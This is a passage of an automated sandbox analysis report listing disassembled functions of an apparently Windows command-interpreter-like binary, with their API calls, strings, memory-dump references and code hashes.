                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: memset$BufferConsoleInfoScreen
                                                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 1034426908-0
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: 99be616fbf856aa69045da91adca869d519164a3f2089509d3aead271a21c490
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: 146fa62d7712ce22476d61f78bb7253ce1ba10cc0c1f54a280e8428da72bb86a
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 99be616fbf856aa69045da91adca869d519164a3f2089509d3aead271a21c490
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0CF17E71A0025D9BDB28DF25CC85ABABBB4FF44344F1450A9E949E7241EB34EE81CF90
                                                                                                                                                                                                                                                                                                                                                      Function 00F045F9 Relevance: 15.2, APIs: 10, Instructions: 150fileCOMMON
                                                                                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                      • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00000000,00000000,00000001,?,00000000,00000001,00F09E02,?,?,00F09E02), ref: 00F04618
                                                                                                                                                                                                                                                                                                                                                      • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00F28E04,?,00F09E02), ref: 00F04637
                                                                                                                                                                                                                                                                                                                                                      • ReadFile.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00F1A7F0,00F09E02,?,00000000,?,00F09E02), ref: 00F04646
                                                                                                                                                                                                                                                                                                                                                      • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00F28E04,?,00F09E02), ref: 00F04653
                                                                                                                                                                                                                                                                                                                                                      • memcmp.MSVCRT(00F1A7F0,00EE34F8,00000003), ref: 00F04693
                                                                                                                                                                                                                                                                                                                                                      • MultiByteToWideChar.API-MS-WIN-CORE-STRING-L1-1-0(?,00000000,00F09E02,00000000,?,00F09E02,?,00F09E02), ref: 00F04720
                                                                                                                                                                                                                                                                                                                                                      • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(?,00F09E02,00000000,00000000,?,00F09E02), ref: 00F04742
                                                                                                                                                                                                                                                                                                                                                      • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00F28E04,?,00F09E02), ref: 00F0474F
                                                                                                                                                                                                                                                                                                                                                      • ReadFile.API-MS-WIN-CORE-FILE-L1-1-0(?,00F1A7F1,00000001,?,00000000,?,00F09E02), ref: 00F04764
                                                                                                                                                                                                                                                                                                                                                      • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00F28E04,?,00F09E02), ref: 00F04771
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: FileLockShared$AcquirePointerReadRelease$ByteCharMultiWidememcmp
                                                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 2002953238-0
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: 0f6bbaa0c36eb32ef0b3296649e2e1f310bcbbeb515ffcb6d83aba1e2e5f7aaf
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: 6f8623d7dc040ad4b7e4ea3cd6ec53ab70697b10222475a6bce79433ddcdf671
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0f6bbaa0c36eb32ef0b3296649e2e1f310bcbbeb515ffcb6d83aba1e2e5f7aaf
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6851E4B2E00209EFDB218F689C44B79BBB9EF42720F184159EA11DB2D0D7719D41FB51
                                                                                                                                                                                                                                                                                                                                                      Function 00EEC897 Relevance: 15.1, APIs: 10, Instructions: 119fileCOMMON
                                                                                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                      • MultiByteToWideChar.API-MS-WIN-CORE-STRING-L1-1-0(?,00000001,00F1A7F0,00000000,?,00000200), ref: 00EEC818
                                                                                                                                                                                                                                                                                                                                                      • wcschr.MSVCRT ref: 00EEC882
                                                                                                                                                                                                                                                                                                                                                      • _get_osfhandle.MSVCRT ref: 00EEC8BA
                                                                                                                                                                                                                                                                                                                                                      • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000), ref: 00EEC8C4
                                                                                                                                                                                                                                                                                                                                                      • _get_osfhandle.MSVCRT ref: 00EEC8DB
                                                                                                                                                                                                                                                                                                                                                      • GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(00000000), ref: 00EEC8ED
                                                                                                                                                                                                                                                                                                                                                      • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00000000,00000000,00000001), ref: 00EEC90D
                                                                                                                                                                                                                                                                                                                                                      • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00F28E04), ref: 00EEC91E
                                                                                                                                                                                                                                                                                                                                                      • ReadFile.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00F1A7F0,00000200,00000000,00000000), ref: 00EEC934
                                                                                                                                                                                                                                                                                                                                                      • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00F28E04), ref: 00EEC941
                                                                                                                                                                                                                                                                                                                                                      • _get_osfhandle.MSVCRT ref: 00EECAC4
                                                                                                                                                                                                                                                                                                                                                      • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000), ref: 00EECACE
                                                                                                                                                                                                                                                                                                                                                      • memcmp.MSVCRT(00F1A7F0,00EE34F8,00000003), ref: 00EFD16E
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: File$Pointer_get_osfhandle$LockShared$AcquireByteCharMultiReadReleaseTypeWidememcmpwcschr
                                                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 1383533039-0
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: 90d1e04a35e4057f80fc3b216912aee3cc4cf353f064d83cd56934e2c38f6f1e
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: 6a2109193dd1b4d64624e13d60c0fd9b7cef4b6fc13ebc224e7fbc58e3dd1176
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 90d1e04a35e4057f80fc3b216912aee3cc4cf353f064d83cd56934e2c38f6f1e
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4E41487090131C8BEF308F249C89BA97676AF48704F2820A9F10AF71D0DB764D92CF56
                                                                                                                                                                                                                                                                                                                                                      Function 00EF0444 Relevance: 15.1, APIs: 5, Strings: 5, Instructions: 97COMMON
                                                                                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: _wcsicmp
                                                                                                                                                                                                                                                                                                                                                      • String ID: CMDEXTVERSION$DEFINED$ERRORLEVEL$EXIST$NOT
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 2081463915-1668778490
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: bfd2bc5f3a9ba868c45cf4fd3dbcaaefaefc338d3ff9d22673677b6500929f87
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: 69531947c4e8c2b781d09d01ed2e20cb3525d8cd4900b7bd18d49b1611bc0bac
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: bfd2bc5f3a9ba868c45cf4fd3dbcaaefaefc338d3ff9d22673677b6500929f87
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9C21FC7120834E9BE7386F75AC1677A77DCDB803A4F24641EE242B51D2DEF4DC019A16
                                                                                                                                                                                                                                                                                                                                                      Function 00F04953 Relevance: 14.3, APIs: 6, Strings: 2, Instructions: 260timeCOMMON
                                                                                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                      • _get_osfhandle.MSVCRT ref: 00F04A7B
                                                                                                                                                                                                                                                                                                                                                      • GetLocalTime.API-MS-WIN-CORE-SYSINFO-L1-1-0(?,00000002,?), ref: 00F04B98
                                                                                                                                                                                                                                                                                                                                                      • SetLocalTime.API-MS-WIN-CORE-SYSINFO-L1-1-0(?,?), ref: 00F04BC5
                                                                                                                                                                                                                                                                                                                                                      • SetLocalTime.API-MS-WIN-CORE-SYSINFO-L1-1-0(?), ref: 00F04BD2
                                                                                                                                                                                                                                                                                                                                                      • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00F04BDC
                                                                                                                                                                                                                                                                                                                                                      • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000), ref: 00F04C30
                                                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: LocalTime$ErrorLast$_get_osfhandle
                                                                                                                                                                                                                                                                                                                                                      • String ID: %s$/-.
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 1033501010-531045382
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: d4598e2f5a1e550d979ef582584d405ff15cc32a1afe13a0a261f07ace4a04d0
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: db471b61efe10e7b5034b54346347a417ca327dd1fc07b727a221f8672528696
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d4598e2f5a1e550d979ef582584d405ff15cc32a1afe13a0a261f07ace4a04d0
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DF8165B2F4020987DB24EE75CC46BFA73A5EFC4720F10416AE602E71D0EA75EE41B654
                                                                                                                                                                                                                                                                                                                                                      Function 00EE7150 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 119COMMON
                                                                                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: _wcsnicmpswscanf
                                                                                                                                                                                                                                                                                                                                                      • String ID: :EOF
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 1534968528-551370653
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: edc450c792db56c2252835322b5fde31aad8277a968276f51e997cd314e99440
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: c91a8cd9719c89ca4504543949a6c8e2b2ffd5af6114e7b623ba4a68a22655a0
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: edc450c792db56c2252835322b5fde31aad8277a968276f51e997cd314e99440
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F8316A316093DC9BC730AF569C49BBA37A8EF45758F086018FAC5B72A1DB748C41DB61
                                                                                                                                                                                                                                                                                                                                                      Function 00F06035 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 113libraryloaderCOMMON
                                                                                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                      • LoadLibraryExW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(NTDLL.DLL,00000000,00000000,?,00000000,?), ref: 00F06069
                                                                                                                                                                                                                                                                                                                                                      • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(00000000,NtQueryInformationProcess), ref: 00F0607E
                                                                                                                                                                                                                                                                                                                                                      • ReadProcessMemory.API-MS-WIN-CORE-MEMORY-L1-1-0(?,?,?,00000480,?), ref: 00F060DC
                                                                                                                                                                                                                                                                                                                                                      • ReadProcessMemory.API-MS-WIN-CORE-MEMORY-L1-1-0(?,?,?,00000004,00000000), ref: 00F06128
                                                                                                                                                                                                                                                                                                                                                      • ReadProcessMemory.API-MS-WIN-CORE-MEMORY-L1-1-0(?,?,?,00000002,00000000), ref: 00F0614F
                                                                                                                                                                                                                                                                                                                                                      • ReadProcessMemory.API-MS-WIN-CORE-MEMORY-L1-1-0(?,00000000,?,00000002,00000000), ref: 00F06186
                                                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: MemoryProcessRead$AddressLibraryLoadProc
                                                                                                                                                                                                                                                                                                                                                      • String ID: NTDLL.DLL$NtQueryInformationProcess
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 1580871199-2613899276
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: 5f794216159f25659f4864520238b68007610d8058afd69ddecbdb262632051e
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: 2491b1cdcc18276376c3a21e55050b5ece3c75eb21cf23d737edcf2082e61d86
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5f794216159f25659f4864520238b68007610d8058afd69ddecbdb262632051e
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 904153B1A0021DAFDB209B24CC85FBB767CEB41B54F0044A9AA05E3281DB709E55EF75
                                                                                                                                                                                                                                                                                                                                                      Function 00EF654B Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 107fileCOMMON
                                                                                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                      • _wcsicmp.MSVCRT ref: 00EF65A4
                                                                                                                                                                                                                                                                                                                                                      • CreateFileW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,80000000,00000001,00000000,00000003,08000080,00000000), ref: 00EF65D7
                                                                                                                                                                                                                                                                                                                                                      • _open_osfhandle.MSVCRT ref: 00EF65EB
                                                                                                                                                                                                                                                                                                                                                      • CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(00000000,?), ref: 00F02092
                                                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: CloseCreateFileHandle_open_osfhandle_wcsicmp
                                                                                                                                                                                                                                                                                                                                                      • String ID: con
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 689241570-4257191772
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: 00721ff431fd4146f22f29e6a88103ae9fa425f73976d33823ac004351510e23
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: 1bf3f01bc4492c872727a7730ae67910be132229e74f0098b80de8fe05002fba
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 00721ff431fd4146f22f29e6a88103ae9fa425f73976d33823ac004351510e23
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DC313872A0021CAFD7349BA89C49BBF7BA9E741334F204229EA12F71C0DB709D01E761
                                                                                                                                                                                                                                                                                                                                                      Function 00F061A2 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 98memoryfileCOMMON
                                                                                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                      • CreateFileW.API-MS-WIN-CORE-FILE-L1-1-0(?,80000000,00000001,00000000,00000003,00000080,00000000,?,00000000,00000104), ref: 00F061D7
                                                                                                                                                                                                                                                                                                                                                      • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?,00000000,00000000,00000040), ref: 00F06211
                                                                                                                                                                                                                                                                                                                                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?,00000014,00000004), ref: 00F06254
                                                                                                                                                                                                                                                                                                                                                      • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 00F0625B
                                                                                                                                                                                                                                                                                                                                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000000,?), ref: 00F0628D
                                                                                                                                                                                                                                                                                                                                                      • RtlFreeHeap.NTDLL ref: 00F06294
                                                                                                                                                                                                                                                                                                                                                      • CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(00000000,00000040), ref: 00F0629B
                                                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: Heap$FileProcess$AllocCloseCreateFreeHandlePointer
                                                                                                                                                                                                                                                                                                                                                      • String ID: PE
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 3093239467-4258593460
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: 62100a44cda0b7fd29606668e2998dd783072f62697011dc87d752615cda7255
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: 4a41f129f099ceae293e2c74ab2bb8328a96534c21b5ebd35ddb4c2c837ea00f
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 62100a44cda0b7fd29606668e2998dd783072f62697011dc87d752615cda7255
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1D318F34A00318ABEF206BA58C19FAE7769ABC9B35F044114FD11D62C0DB749826FAB1
                                                                                                                                                                                                                                                                                                                                                      Function 00EE802C Relevance: 13.7, APIs: 9, Instructions: 175COMMON
                                                                                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00EE8060
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EEE3F0: memset.MSVCRT ref: 00EEE455
                                                                                                                                                                                                                                                                                                                                                      • ??_V@YAXPAX@Z.MSVCRT(?,-00000001,00000000,?,00000000), ref: 00EE81BE
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EEDCD0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?,?,00EEACD8,00000001,?,00000000,00EE8C23,-00000105,00F0C9B0,00000240,00EF1E92,00000000,00000000,00EFACE0,00000000), ref: 00EEDCE1
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EEDCD0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,00EEACD8,00000001,?,00000000,00EE8C23,-00000105,00F0C9B0,00000240,00EF1E92,00000000,00000000,00EFACE0,00000000,00000000), ref: 00EEDCE8
                                                                                                                                                                                                                                                                                                                                                      • GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000000,00000000,-00000001,00000000,?,00000000), ref: 00EE818C
                                                                                                                                                                                                                                                                                                                                                      • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00EE8197
                                                                                                                                                                                                                                                                                                                                                      • longjmp.MSVCRT(00F20A30,00000001,-00000001,00000000,?,00000000), ref: 00EFB09E
                                                                                                                                                                                                                                                                                                                                                      • EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,00F07FC9,?,00F099AE,00000000,?,00000000,00EFCF94,00000000,?), ref: 00EFB0AB
                                                                                                                                                                                                                                                                                                                                                      • LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,00F07FC9,?,00F099AE,00000000,?,00000000,00EFCF94,00000000,?), ref: 00EFB0C1
                                                                                                                                                                                                                                                                                                                                                      • fprintf.MSVCRT ref: 00EFB0D5
                                                                                                                                                                                                                                                                                                                                                      • fflush.MSVCRT ref: 00EFB0E3
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EE8F21: _wcsicmp.MSVCRT ref: 00EE8FCD
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EE8F21: _wcsicmp.MSVCRT ref: 00EE8FE3
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EE8F21: GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0(?), ref: 00EE9002
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EE8F21: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00EE9013
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EE8E9E: GetCurrentDirectoryW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,00F28BF0,00000000,?), ref: 00EE8EC3
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EF1CD5: SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,00000000,?,00000000,00000000,?,?,?,00EE80F4,00000000,00000000,-00000001,00000000,?,00000000), ref: 00EF1D3A
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EF1CD5: SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000001,?,00EE80F4,00000000,00000000,-00000001,00000000,?,00000000), ref: 00EF1D44
